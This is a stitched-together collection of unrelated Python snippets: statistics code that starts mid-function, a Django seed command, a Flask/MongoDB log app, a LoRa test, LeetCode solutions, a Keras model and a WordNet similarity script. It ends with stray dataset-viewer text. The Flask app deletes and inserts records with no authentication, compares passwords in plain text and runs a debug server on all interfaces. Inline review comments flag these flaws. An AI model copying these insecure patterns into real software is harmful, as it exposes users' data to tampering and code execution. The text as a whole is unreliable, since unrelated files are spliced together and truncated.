    """Multinomial-style density: 100! * prod(a_i**b_i) / prod(b_i!), scaled by 1/10000.

    `a` holds per-outcome probabilities and `b` the corresponding counts
    (coerced to int before use).
    """
    denom = 1
    numer = 1
    for i in range(len(a)):
        denom *= math.factorial(int(b[i]))
        numer *= math.pow(a[i], int(b[i]))
    density = math.factorial(100) * numer / denom
    return density / 10000
def find_info(x, y):
    """Mutual-information-style score between worksheet columns *x* and *y*.

    Reads rows 2..10000 of the module-level worksheet `aladata`.
    NOTE(review): the `+1` inside the log keeps the argument positive but
    deviates from the textbook MI formula — confirm it is intentional.
    O(|x1|*|y1|*10000): the joint count rescans all rows per value pair.
    """
    fx = []
    fy = []
    for i in range(2, 10001, 1):  # rows 2..10000 hold the samples
        fx.append(aladata.cell(row=i, column=x).value)
        fy.append(aladata.cell(row=i, column=y).value)
    x1 = list(set(fx))  # distinct values of column x
    y1 = list(set(fy))  # distinct values of column y
    info = 0
    for q in x1:
        for r in y1:
            # s: joint relative frequency of the pair (q, r)
            s = 0
            for j in range(2, 10001, 1):
                if aladata.cell(row=j, column=x).value == q and aladata.cell(row=j, column=y).value == r:
                    s += 1
            s = s / 10000
            p1 = find_count(fx, q)  # marginal frequency of q
            p2 = find_count(fy, r)  # marginal frequency of r
            #try:
            info += s * math.log((s / (p1 * p2)) + 1)
            #except:
            #pass
    return info
def find_count(li, v):
    """Relative frequency of value *v* in list *li*, as a float in [0, 1]."""
    matches = sum(1 for item in li if item == v)
    return matches / float(len(li))
# Pass 1: per-variable probability estimate for each of the 37 columns.
for k in range(1, 38, 1):
    l = []
    for i in range(2, 10001, 1):  # collect the 10K samples of column k
        l.append(aladata.cell(row=i, column=k).value)
    probab = list(set(l))  # distinct values taken by this variable
    s = []
    outcomes = []
    for p in probab:
        sum1 = 0
        for l1 in l:
            if l1 == p:
                sum1 += 1
        # NOTE(review): counts are scaled by 100.0 here but by 10000.0 below,
        # while find_pdf hard-codes a multinomial with N=100 — confirm the
        # intended scaling.
        outcomes.append(sum1 / 100.0)
        s.append(sum1 / 10000.0)
    individualp.append(find_pdf(s, outcomes))

# Pass 2: pairwise information matrix (upper triangle; diagonal fixed to 1)
# plus a 0/1 relation matrix thresholded at 0.7.
mat = np.zeros((37, 37))
rel_mat = np.zeros((37, 37))
count = 0;
for mi in range(1, 38, 1):
    for mj in range(1, 38, 1):
        if mi == mj:
            mat[mi-1][mj-1] = 1
        if mi < mj:
            mat[mi-1][mj-1] = find_info(mi, mj)
            # count the strongly related (above-threshold) pairs
            if (mat[mi-1][mj-1] > 0.7):
                rel_mat[mi-1][mj-1] = 1
                count = count + 1
print(mat)
print(rel_mat)
print(count)
from django.core.management.base import BaseCommand, CommandError
from app.models import User
class Command(BaseCommand):
    """Management command that wipes the User table and re-seeds it with test users."""
    help = 'Create test data: users'

    def handle(self, *args, **options):
        print('Start!')
        # clear all users
        User.objects.all().delete()
        # Insert new users
        seed_users = [
            dict(first_name='James', last_name='Karter',
                 email='james.karter@gmail.com', status=1),
            dict(first_name='Mike', last_name='Hitch',
                 email='mike.hith@gmail.com', status=5),
            dict(first_name='Kate', last_name='Monson',
                 email='kate@gmail.com', status=9),
            # NOTE(review): 'alex.com' is not a valid e-mail address —
            # confirm whether that is deliberate test data.
            dict(first_name='Alex', last_name='Midlton',
                 email='alex.com', status=5),
        ]
        for fields in seed_users:
            User.objects.create(**fields)
        count = User.objects.all().count()
        print(f'Success! Inserted records: {count}')
|
import flask
import os
import pymongo
import datetime
from flask import Response, jsonify, render_template, request, json, Flask, session, redirect
from flask_bootstrap import Bootstrap
# BUG FIX: the `flask.ext.*` import namespace was removed in Flask 1.0;
# the Flask-Session extension is imported as `flask_session`.
from flask_session import Session
from bson import BSON, json_util, Binary, Code
from bson.objectid import ObjectId
from bson.errors import InvalidId
from bson.json_util import dumps, loads
from user_controller import UserController
from log_controller import LogController

app = flask.Flask(__name__, static_url_path='/static')
# Server-side sessions stored in MongoDB, database `test_db`.
SESSION_TYPE = 'mongodb'
SESSION_MONGODB_DB = 'test_db'
app.config.from_object(__name__)
Session(app)
Bootstrap(app)
def cursor_to_list(cursor):
    """Flatten a cursor's items into a single list.

    NOTE(review): `extend` iterates each element, so for a cursor of dicts
    this collects the documents' KEYS rather than the documents themselves —
    `append` may have been intended. Confirm against callers before changing.
    """
    out = []
    for asd in cursor:
        out.extend(asd)
    return out
def response(success, data):
    """Wrap *data* in the app's standard {'success', 'data'} JSON envelope."""
    payload = {'success': success, 'data': data}
    return Response(json.dumps(payload), mimetype='application/json')
def List(data):
    """Materialize *data* as a list, stringifying each document's `_id` in place
    so ObjectIds become JSON-serializable."""
    documents = list(data)
    for document in documents:
        if "_id" in document:
            document["_id"] = str(document["_id"])
    return documents
def GetRole():
    """Return the current session's role, or 'not set' for anonymous visitors."""
    return session.get("role", 'not set')
@app.after_request
def add_header(r):
    """
    Add headers to both force latest IE rendering engine or Chrome Frame,
    and also to cache the rendered page for 10 minutes.

    NOTE(review): the final Cache-Control assignment below overwrites the
    no-cache/no-store value set first — only 'public, max-age=0' is sent.
    Confirm which policy is intended.
    """
    r.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
    r.headers["Pragma"] = "no-cache"
    r.headers["Expires"] = "0"
    r.headers['Cache-Control'] = 'public, max-age=0'
    return r
@app.route('/')
def get_page():
    """Landing page: redirect by session role, or serve the login page."""
    print(session)
    role = GetRole()
    if role == "user":
        print("User")
        return redirect("/view-logs")
    elif role == "admin":
        print("Admin")
        return redirect("/admin")
    else:
        print("Not set")
        return app.send_static_file('index.html')
@app.route('/logout')
def logout():
    """Drop the role from the session and return to the landing page."""
    if "role" in session:
        session.pop("role")
    return redirect("/")
@app.route('/view-logs')
def get_logs():
    """Serve the log-viewer page to users; everyone else goes back home."""
    if GetRole() == "user":
        return app.send_static_file('user.html')
    else:
        return redirect("/")
@app.route('/admin')
def admin():
    """Serve the admin console to admins; everyone else goes back home."""
    if GetRole() == "admin":
        return app.send_static_file('admin.html')
    else:
        return redirect("/")
@app.route('/users/all', methods=['GET'])
def get_all_user():
    """Return every user as JSON.

    NOTE(review): unlike the /users GET handler, this performs no role check.
    """
    user_controller = UserController()
    user_dict = user_controller.get_users()
    user_json = List(user_dict)  # stringify ObjectIds for JSON
    print(user_dict)
    return response(True, user_json)
@app.route('/users', methods=['POST'])
def post_user():
    """Insert the posted JSON document as a new user.

    NOTE(review): no authentication or duplicate check here (contrast with
    /register) — confirm this is intended.
    """
    user_controller = UserController()
    user_controller.insert_user(flask.request.json)
    return "OK"
@app.route('/users', methods=['GET'])
def get_user():
    """Admin-only lookup of a single user via the ?username= query parameter."""
    if GetRole() == "admin":
        user_controller = UserController()
        username = request.args.get('username')
        user_dict = user_controller.get_user(username)
        user_json = json.dumps(user_dict)
        return user_json
    else:
        return json.dumps({"msg": "Permission denied"}), 401
@app.route('/users', methods=['DELETE'])
def delete_user():
    """Delete the user named in the JSON body.

    NOTE(review): no role check, unlike the GET handler above — confirm.
    """
    user_controller = UserController()
    username = flask.request.json['username']
    user_controller.delete_user(username)
    return "OK"
@app.route('/logs', methods=['POST'])
def post_log():
    """Store the posted JSON document as a log entry (no auth check performed)."""
    log_controller = LogController()
    log_controller.insert_log(flask.request.json)
    return "OK"
@app.route('/register', methods=['POST'])
def register():
    """Create a new user from the posted JSON unless the username is taken."""
    flask.request.json["date"] = datetime.datetime.now()  # stamp registration time
    print(flask.request.json)
    user_controller = UserController()
    if user_controller.get_user(flask.request.json['username']) is None:
        user_controller.insert_user(flask.request.json)
        return "OK"
    else:
        return json.dumps({"msg": "User is already registered"}), 401
@app.route('/login', methods=['POST'])
def login():
    """Validate the posted credentials and store the user's role in the session."""
    user_controller = UserController()
    username_password_dict = flask.request.json
    username_from_req = username_password_dict['username']
    user_from_db = user_controller.get_user(username_from_req)
    # BUG FIX: an unknown username made get_user() return None and the
    # subscriptions below crashed with a TypeError (HTTP 500). Treat it the
    # same as a bad password.
    if user_from_db is None:
        return json.dumps({"msg": "Bad username or password"}), 401
    username = user_from_db['username']
    password = user_from_db['password']
    # NOTE(review): passwords appear to be compared in plain text — confirm
    # the storage/hashing strategy.
    if username != username_password_dict['username'] or password != username_password_dict['password']:
        return json.dumps({"msg": "Bad username or password"}), 401
    session["role"] = user_from_db["role"]
    return json.dumps({"msg": "Success"}), 200
@app.route('/logs', methods=['GET'])
def get_log():
    """Return all log entries to logged-in users or admins."""
    if GetRole() == "user" or GetRole() == "admin":
        log_controller = LogController()
        log_dict = log_controller.get_log()
        log_json = List(log_dict)  # stringify ObjectIds for JSON
        return response(True, log_json)
    else:
        return json.dumps({"msg": "Permission denied"}), 401
@app.route('/logs', methods=['DELETE'])
def delete_log():
    """Delete the log whose _id is given in the JSON body (no auth check)."""
    log_controller = LogController()
    _id = flask.request.json["_id"]
    log_controller.delete_log(_id)
    return "OK"
@app.route('/hello')
def hello2():
    """Simple liveness-check endpoint."""
    return "hello"
if __name__ == "__main__":
    # NOTE(review): binds to all interfaces with debug=True (the Werkzeug
    # debugger allows arbitrary code execution) — development use only.
    app.run('0.0.0.0', debug=True)
|
from loraModes import rak811P2P
import utime
# P2P radio test: configure the RAK811 on UART 1 at 115200 baud
# (868 MHz, SF7, preamble 6) and broadcast 100 numbered messages.
raks = rak811P2P(1, 115200, freq=868000000, spreading=7, preamble=6, debug=True)
res = raks.start()
if res == "OK":
    print(raks.getStatus())
    for count in range(100):
        utime.sleep_ms(500)  # throttle: one message every 500 ms
        msg = "Effevee" + str(count)
        raks.send(msg)
raks.stop()
import unittest
import lab6_LoginPageUnitTest
import Lab7_CountOfWebElements
# two test cases are run together
class Test_Suite(unittest.TestCase):
    """Aggregates the lab 6 and lab 7 test modules into one suite and runs it."""

    def test_main(self):
        # Load every test from both imported modules, then run them with the
        # plain text runner.
        self.suite = unittest.TestSuite()
        self.suite.addTests([unittest.TestLoader().loadTestsFromModule(lab6_LoginPageUnitTest),
                             unittest.TestLoader().loadTestsFromModule(Lab7_CountOfWebElements)])
        runner = unittest.TextTestRunner()
        runner.run(self.suite)


if __name__ == "__main__":
    unittest.main()
import json
import os
import shutil
import math
import pandas as pd
import cv2
import glob
import numpy as np
import subprocess
# Source directories for the REAL and SYN sentence-morpheme JSON annotations.
real_path = os.path.join(os.path.curdir, 'REAL(1500)\\REAL_SENTENCE_morpheme')
syn_path = os.path.join(os.path.curdir, 'SYN(1500)\\SYN_SENTENCE_morpheme')
video = {}       # video file name -> attribute-name label (from the morpheme JSON)
video_data = {}  # video file name -> per-frame keypoint lists
def shutil_video(v, s, e):
    """Cut the segment from *s* to *e* out of video *v* with ffmpeg (stream copy).

    Writes the clip to output.mp4 in the current directory.
    BUG FIX: the original built a malformed command string (never used) and
    then called subprocess.check_call() with no arguments, which raises
    TypeError. The command is now passed as an argument list (no shell).
    """
    cmd = ['ffmpeg', '-i', v, '-ss', str(s), '-to', str(e), '-c', 'copy', 'output.mp4']
    subprocess.check_call(cmd)
def files_in_dir(target):
    """Return every entry of directory *target*, each joined with the directory path."""
    return [os.path.join(target, name) for name in os.listdir(target)]
def normalization(array):
    """Scale alternating x/y keypoint coordinates into [0, 1].

    Even indices are x pixels (divided by the 2048 frame width), odd indices
    are y pixels (divided by the 1152 frame height). The input array is not
    modified; a scaled copy is returned.
    """
    scaled = array.copy()
    scaled[0::2] /= 2048  # x coordinates
    scaled[1::2] /= 1152  # y coordinates
    return scaled
if __name__ == '__main__':
    # Video to name labeling
    real_data = files_in_dir(real_path)
    syn_data = files_in_dir(syn_path)
    for data in real_data:
        with open(data, 'r', encoding='UTF-8') as f:
            data = f.read()  # note: rebinds the loop variable to the file contents
        jdata = json.loads(data)
        # map video file name -> its first attribute name
        video[jdata['metaData']['name']] = jdata['data'][0]['attributes'][0]['name']
    # Video to data labeling
    for mp4 in video:
        if 'SEN' in mp4:
            # one OpenPose JSON per frame, under the video's keypoints folder
            openposed_data = files_in_dir(os.path.join(os.path.curdir, 'REAL(1500)\\REAL_SENTENCE_keypoints', mp4[:mp4.rfind('.')]))
            face_keypoints_2d_temp = []
            pose_keypoints_2d_temp = []
            hand_left_keypoints_2d_temp = []
            hand_right_keypoints_2d_temp = []
            face_keypoints_3d_temp = []
            pose_keypoints_3d_temp = []
            hand_left_keypoints_3d_temp = []
            hand_right_keypoints_3d_temp = []
            for keypoints in openposed_data:
                with open(keypoints, 'r') as f:
                    data = f.read()
                data = json.loads(data)
                # NOTE(review): OpenPose normally emits 'people' as a LIST of
                # person dicts; indexing it with a string key would raise
                # TypeError — confirm the JSON layout (data['people'][0][...]?).
                face_keypoints_2d_temp.append(data['people']['face_keypoints_2d'])
                # pose_keypoints_2d_temp.append(data['people']['pose_keypoints_2d'])
                # hand_left_keypoints_2d_temp.append(data['people']['hand_left_keypoints_2d'])
                # hand_right_keypoints_2d_temp.append(data['people']['hand_right_keypoints_2d'])
                # face_keypoints_3d_temp.append(data['people']['face_keypoints_3d'])
                # pose_keypoints_3d_temp.append(data['people']['pose_keypoints_3d'])
                # hand_left_keypoints_3d_temp.append(data['people']['hand_left_keypoints_3d'])
                # hand_right_keypoints_3d_temp.append(data['people']['hand_right_keypoints_3d'])
            video_data[mp4] = [face_keypoints_2d_temp, pose_keypoints_2d_temp, hand_left_keypoints_2d_temp, hand_right_keypoints_2d_temp, face_keypoints_3d_temp, pose_keypoints_3d_temp, hand_left_keypoints_3d_temp, hand_right_keypoints_3d_temp]
            print(video_data)
            print(video_data[mp4][0])
            exit(1)  # debugging stop after the first SEN video
    # with open('test.txt', 'w') as f:
    #     json.dump(video_data, f)
    # exit(1)
|
# [Classic]
# https://leetcode.com/problems/max-value-of-equation/
# 1499. Max Value of Equation
# History:
# Google
# 1.
# Aug 1, 2020
# Given an array points containing the coordinates of points on a 2D plane, sorted by the
# x-values, where points[i] = [xi, yi] such that xi < xj for all 1 <= i < j <= points.length. You
# are also given an integer k.
#
# Find the maximum value of the equation yi + yj + |xi - xj| where |xi - xj| <= k and 1 <= i < j
# <= points.length. It is guaranteed that there exists at least one pair of points that satisfy
# the constraint |xi - xj| <= k.
#
#
#
# Example 1:
#
# Input: points = [[1,3],[2,0],[5,10],[6,-10]], k = 1
# Output: 4
# Explanation: The first two points satisfy the condition |xi - xj| <= 1 and if we calculate the
# equation we get 3 + 0 + |1 - 2| = 4. Third and fourth points also satisfy the condition and
# give a value of 10 + -10 + |5 - 6| = 1.
# No other pairs satisfy the condition, so we return the max of 4 and 1.
# Example 2:
#
# Input: points = [[0,0],[3,0],[9,2]], k = 3
# Output: 3
# Explanation: Only the first two points have an absolute difference of 3 or less in the
# x-values, and give the value of 0 + 0 + |0 - 3| = 3.
#
#
# Constraints:
#
# 2 <= points.length <= 10^5
# points[i].length == 2
# -10^8 <= points[i][0], points[i][1] <= 10^8
# 0 <= k <= 2 * 10^8
# points[i][0] < points[j][0] for all 1 <= i < j <= points.length
# xi form a strictly increasing sequence.
from collections import deque
class SolutionDeque(object):
    """Monotonic-deque solution: O(n) time, O(n) space."""

    def findMaxValueOfEquation(self, points, k):
        """
        :type points: List[List[int]]
        :type k: int
        :rtype: int
        """
        # With xj > xi, yi + yj + |xi - xj| = (yi - xi) + (xj + yj).
        # Keep candidate (yi - xi, xi) pairs in a deque whose first entry
        # maximizes yi - xi among in-window points.
        window = deque()
        best = float('-inf')
        for xj, yj in points:
            # Drop candidates farther than k to the left of xj.
            while window and xj - window[0][1] > k:
                window.popleft()
            if window:
                best = max(best, window[0][0] + xj + yj)
            # Keep the deque decreasing in (y - x) before inserting.
            while window and window[-1][0] < yj - xj:
                window.pop()
            window.append((yj - xj, xj))
        return best
from heapq import heappop, heappush
# Time O(NlogN)
# Space O(N)
class SolutionPrirotyQueue(object):
    """Lazy-deletion heap solution: O(n log n) time, O(n) space."""

    def findMaxValueOfEquation(self, points, k):
        """
        :type points: List[List[int]]
        :type k: int
        :rtype: int
        """
        # With xj > xi, yi + yj + |xi - xj| = (yi - xi) + (xj + yj).
        # Store (xi - yi, xi) so the min-heap top maximizes yi - xi.
        candidates = []
        best = float('-inf')
        for xj, yj in points:
            # Lazily discard candidates outside the window |xj - xi| <= k.
            while candidates and xj - candidates[0][1] > k:
                heappop(candidates)
            if candidates:
                best = max(best, xj + yj - candidates[0][0])
            heappush(candidates, (xj - yj, xj))
        return best
|
"""All global variables and triggers are grouped here"""
from data_containers.special_cases import SituationalData
from data_containers.our_possessions import OurPossessionsData
from data_containers.ungrouped_data import OtherData
class MainDataContainer(SituationalData, OurPossessionsData, OtherData):
    """This is the main data container for all data the bot requires"""

    def __init__(self):
        # Each mixin is initialized explicitly (no cooperative super() chain).
        SituationalData.__init__(self)
        OurPossessionsData.__init__(self)
        OtherData.__init__(self)
        # Both are refreshed every iteration by enemy_special_cases().
        self.close_enemy_production = self.floated_buildings_bm = None

    def enemy_special_cases(self):
        """Pretty much makes SituationalData be updated all iterations"""
        self.prepare_enemy_data()
        self.close_enemy_production = self.check_for_proxy_buildings()
        self.floated_buildings_bm = self.check_for_floated_buildings()

    def prepare_data(self):
        """Prepares the data every iteration"""
        # Reset per-iteration flags before recomputing everything below.
        self.counter_attack_vs_flying = self.close_enemies_to_base = False
        self.initialize_our_stuff()
        self.initialize_enemies()
        self.prepare_bases_data()
        self.enemy_special_cases()
|
import numpy as np
import keras
from keras.models import Model, load_model
from keras.layers import Dense, Input, Concatenate, Dropout, Add, Lambda, BatchNormalization
from keras import regularizers
from keras import backend as K
from keras.engine.topology import Layer
def load_model(location=None):
    """Load a saved Keras model from *location*, or build the multimodal model.

    NOTE(review): this function shadows the `load_model` imported from
    keras.models at the top of the file; the import stays reachable only as
    `keras.models.load_model` (as used below).
    """
    if (location != None):
        model = keras.models.load_model(location)
        print("Loaded the model.")
        return model

    # One input per modality (per-modality feature sizes).
    COVAREP = Input(shape=(95,))
    formant = Input(shape=(30,))
    text = Input(shape=(80,))
    action_units = Input(shape=(35,))
    eye_gaze = Input(shape=(25,))
    facial_landmarks = Input(shape=(85,))
    head_pose = Input(shape=(15,))
    #X_gender = Input(shape = (2,))

    # Project every modality to a common dimensionality.
    common_dim = 60
    COVAREP_dim_adjusted = Dense(common_dim, activation='relu')(COVAREP)
    #COVAREP_dim_adjusted = BatchNormalization(center = False, scale = False)(COVAREP_dim_adjusted)
    formant_dim_adjusted = Dense(common_dim, activation='relu')(formant)
    #formant_dim_adjusted = BatchNormalization(center = False, scale = False)(formant_dim_adjusted)
    text_dim_adjusted = Dense(common_dim, activation='relu')(text)
    #text_dim_adjusted = BatchNormalization(center = False, scale = False)(text_dim_adjusted)
    action_units_dim_adjusted = Dense(common_dim, activation='relu')(action_units)
    #action_units_dim_adjusted = BatchNormalization(center = False, scale = False)(action_units_dim_adjusted)
    eye_gaze_dim_adjusted = Dense(common_dim, activation='relu')(eye_gaze)
    #eye_gaze_dim_adjusted = BatchNormalization(center = False, scale = False)(eye_gaze_dim_adjusted)
    facial_landmarks_dim_adjusted = Dense(common_dim, activation='relu')(facial_landmarks)
    #facial_landmarks_dim_adjusted = BatchNormalization(center = False, scale = False)(facial_landmarks_dim_adjusted)
    head_pose_dim_adjusted = Dense(common_dim, activation='relu')(head_pose)
    #head_pose_dim_adjusted = BatchNormalization(center = False, scale = False)(head_pose_dim_adjusted)

    # Softmax attention weights over the 7 modalities.
    P = Concatenate(axis=1)([COVAREP_dim_adjusted, formant_dim_adjusted, text_dim_adjusted, action_units_dim_adjusted, eye_gaze_dim_adjusted, facial_landmarks_dim_adjusted, head_pose_dim_adjusted])
    P = Dense(250, activation='tanh')(P)
    alpha = Dense(7, activation='softmax')(P)
    # NOTE(review): alpha has 7 weights but the weighted sum below combines
    # only 6 tensors and skips eye_gaze_dim_adjusted; alpha[:, 6:7] is never
    # used. Also the Lambda ignores its input `x` and closes over outer
    # tensors. Confirm whether eye gaze was meant to be fused.
    F = Lambda(lambda x: alpha[:, 0:1]*COVAREP_dim_adjusted + alpha[:, 1:2]*formant_dim_adjusted + alpha[:, 2:3]*text_dim_adjusted + alpha[:, 3:4]*action_units_dim_adjusted + alpha[:, 4:5]*facial_landmarks_dim_adjusted + alpha[:, 5:6]*head_pose_dim_adjusted)(alpha)
    #Y = Concatenate(axis = -1)([F, X_gender])
    Y = Dense(53, activation='relu')(F)
    Y = Dropout(rate=0.25)(Y)
    #Y = Dense(105, activation = 'relu')(Y)
    #Y = Dropout(rate = 0.2)(Y)
    # Two heads: a 1-unit linear output ('DLR') and a 2-way softmax ('GP',
    # presumably gender given the Y_gender name — confirm).
    Y_dep = Dense(1, activation=None, name='DLR')(Y)
    Y_gender = Dense(2, activation='softmax', name='GP')(Y)
    model = Model(inputs=[COVAREP, formant, text, action_units, eye_gaze, facial_landmarks, head_pose], outputs=[Y_dep, Y_gender])
    print("Created a new model.")
    return model
# Build a fresh (untrained) model when run directly.
if (__name__ == "__main__"):
    m = load_model()
# coding=utf-8
import copy
"""
581. Shortest Unsorted Continuous Subarray
"""
class Solution(object):
    """581. Shortest Unsorted Continuous Subarray — two approaches."""

    def findUnsortedSubarray(self, nums):
        """Sort-and-compare approach, O(n log n) time.

        :type nums: List[int]
        :rtype: int
        """
        if not nums:
            return 0
        if len(nums) == 1:
            return 0
        ordered = sorted(nums)
        lo, hi = 0, len(nums) - 1
        # Shrink from the left while the prefix already matches the sorted order.
        while lo <= hi and nums[lo] == ordered[lo]:
            lo += 1
        # Shrink from the right while the suffix already matches.
        while lo <= hi and nums[hi] == ordered[hi]:
            hi -= 1
        return hi - lo + 1

    def findUnsortedSubarray1(self, nums):
        # One-pass boundary expansion, O(n). Detailed explanation:
        # https://leetcode.com/problems/shortest-unsorted-continuous-subarray/discuss/103066/Ideas-behind-the-O(n)-two-pass-and-one-pass-solutions
        if not nums:
            return 0
        left, right = 0, len(nums) - 1
        # Advance past the sorted prefix.
        while left < right and nums[left] <= nums[left + 1]:
            left += 1
        if left == right:  # whole array already sorted
            return 0
        # Retreat past the sorted suffix.
        while nums[right] >= nums[right - 1]:
            right -= 1
        window_max = max(nums[left:right + 1])
        window_min = min(nums[left:right + 1])
        # Expand outward so every element smaller/larger than the window
        # extremes ends up inside it.
        while left >= 0 and nums[left] > window_min:
            left -= 1
        while right < len(nums) and nums[right] < window_max:
            right += 1
        return right - left - 1
|
# -*- coding: utf-8 -*-
"""
Created on Tue Feb 6 21:31:21 2018
@author: shivangi
"""
from __future__ import division
from nltk.corpus import wordnet as wn
import math
import sys
# Parameters to the algorithm. Currently set to values that were reported
# in the paper to produce "best" results.
ALPHA = 0.2   # decay rate applied to the shortest-path length (length_dist)
BETA = 0.45   # depth scaling rate for the hierarchy term (hierarchy_dist)
######################### word similarity ##########################
def get_best_synset_pair(word_1, word_2):
    """
    Choose the pair with highest path similarity among all pairs.
    Mimics pattern-seeking behavior of humans.
    Returns (None, None) when either word has no WordNet synsets.
    """
    synsets_1 = wn.synsets(word_1)
    synsets_2 = wn.synsets(word_2)
    if len(synsets_1) == 0 or len(synsets_2) == 0:
        return None, None
    max_sim = -1.0
    best_pair = None, None
    for synset_1 in synsets_1:
        for synset_2 in synsets_2:
            sim = wn.path_similarity(synset_1, synset_2)
            # BUG FIX: path_similarity() can return None; on Python 3 the old
            # `if sim > max_sim` inside a bare try/except relied on the
            # resulting TypeError to skip the pair. Check for None explicitly
            # instead of using exceptions for control flow.
            if sim is not None and sim > max_sim:
                max_sim = sim
                best_pair = synset_1, synset_2
    return best_pair
def length_dist(synset_1, synset_2):
    """
    Return a measure of the length of the shortest path in the semantic
    ontology (Wordnet in our case as well as the paper's) between two
    synsets. The raw path length is mapped to exp(-ALPHA * length), so the
    result lies in (0, 1] with 1.0 meaning identical synsets.
    """
    l_dist = sys.maxsize
    if synset_1 is None or synset_2 is None:
        return 0.0
    if synset_1 == synset_2:
        # if synset_1 and synset_2 are the same synset return 0
        l_dist = 0.0
    else:
        wset_1 = set([str(x.name()) for x in synset_1.lemmas()])
        wset_2 = set([str(x.name()) for x in synset_2.lemmas()])
        if len(wset_1.intersection(wset_2)) > 0:
            # if synset_1 != synset_2 but there is word overlap, return 1.0
            l_dist = 1.0
        else:
            # just compute the shortest path between the two
            l_dist = synset_1.shortest_path_distance(synset_2)
            if l_dist is None:
                # no connecting path found; treat as distance 0
                l_dist = 0.0
    # normalize path length to the range [0,1]
    return math.exp(-ALPHA * l_dist)
def hierarchy_dist(synset_1, synset_2):
    """
    Return a measure of depth in the ontology to model the fact that
    nodes closer to the root are broader and have less semantic similarity
    than nodes further away from the root. The final expression is the
    hyperbolic tangent of BETA * depth, so deeper subsumers score closer to 1.
    """
    h_dist = sys.maxsize
    if synset_1 is None or synset_2 is None:
        return h_dist
    if synset_1 == synset_2:
        # return the depth of one of synset_1 or synset_2
        h_dist = max([x[1] for x in synset_1.hypernym_distances()])
    else:
        # find the max depth of least common subsumer
        hypernyms_1 = {x[0]: x[1] for x in synset_1.hypernym_distances()}
        hypernyms_2 = {x[0]: x[1] for x in synset_2.hypernym_distances()}
        lcs_candidates = set(hypernyms_1.keys()).intersection(
            set(hypernyms_2.keys()))
        if len(lcs_candidates) > 0:
            # for each shared hypernym keep the larger of its two distances,
            # then take the deepest candidate
            lcs_dists = []
            for lcs_candidate in lcs_candidates:
                lcs_d1 = 0
                if lcs_candidate in hypernyms_1:
                    lcs_d1 = hypernyms_1[lcs_candidate]
                lcs_d2 = 0
                if lcs_candidate in hypernyms_2:
                    lcs_d2 = hypernyms_2[lcs_candidate]
                lcs_dists.append(max([lcs_d1, lcs_d2]))
            h_dist = max(lcs_dists)
        else:
            # no common subsumer at all
            h_dist = 0
    # equivalent to tanh(BETA * h_dist)
    return ((math.exp(BETA * h_dist) - math.exp(-BETA * h_dist)) /
            (math.exp(BETA * h_dist) + math.exp(-BETA * h_dist)))
def word_similarity(word_1, word_2):
    """Similarity of two words: product of the path-length and depth measures
    computed on their best (highest path-similarity) synset pair."""
    synset_pair = get_best_synset_pair(word_1, word_2)
    return (length_dist(synset_pair[0], synset_pair[1]) *
            hierarchy_dist(synset_pair[0], synset_pair[1]))
######################### main / test ##########################
# the results of the algorithm are largely dependent on the results of
# the word similarities, so we should test this first...
# Each entry: [word_1, word_2, reference similarity score]; the third column
# is printed alongside the computed value for visual comparison.
word_pairs = [
    ["asylum", "fruit", 0.21],
    ["autograph", "shore", 0.29],
    ["autograph", "signature", 0.55],
    ["automobile", "car", 0.64],
    ["bird", "woodland", 0.33],
    ["boy", "rooster", 0.53],
    ["boy", "lad", 0.66],
    ["boy", "sage", 0.51],
    ["cemetery", "graveyard", 0.73],
    ["coast", "forest", 0.36],
    ["coast", "shore", 0.76],
    ["cock", "rooster", 1.00],
    ["cord", "smile", 0.33],
    ["cord", "string", 0.68],
    ["cushion", "pillow", 0.66],
    ["forest", "graveyard", 0.55],
    ["forest", "woodland", 0.70],
    ["furnace", "stove", 0.72],
    ["glass", "tumbler", 0.65],
    ["grin", "smile", 0.49],
    ["gem", "jewel", 0.83],
    ["hill", "woodland", 0.59],
    ["hill", "mound", 0.74],
    ["implement", "tool", 0.75],
    ["journey", "voyage", 0.52],
    ["magician", "oracle", 0.44],
    ["magician", "wizard", 0.65],
    ["midday", "noon", 1.0],
    ["oracle", "sage", 0.43],
    ["serf", "slave", 0.39]
]
# Print: word_1, word_2, reference score, computed similarity (tab-separated).
for word_pair in word_pairs:
    print("%s\t%s\t%.2f\t%.2f" % (word_pair[0], word_pair[1], word_pair[2],
                                  word_similarity(word_pair[0], word_pair[1])))
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.